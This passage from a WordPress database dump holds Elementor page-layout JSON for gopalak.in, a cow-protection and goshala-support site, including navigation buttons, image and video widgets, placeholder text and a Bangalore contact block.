ype\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9997,1674,'_elementor_page_assets','a:0:{}'),(9999,1675,'_elementor_edit_mode','builder'),(10000,1675,'_elementor_template_type','wp-page'),(10001,1675,'_elementor_version','3.7.8'),(10002,1675,'_wp_page_template','elementor_canvas'),(10003,1675,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\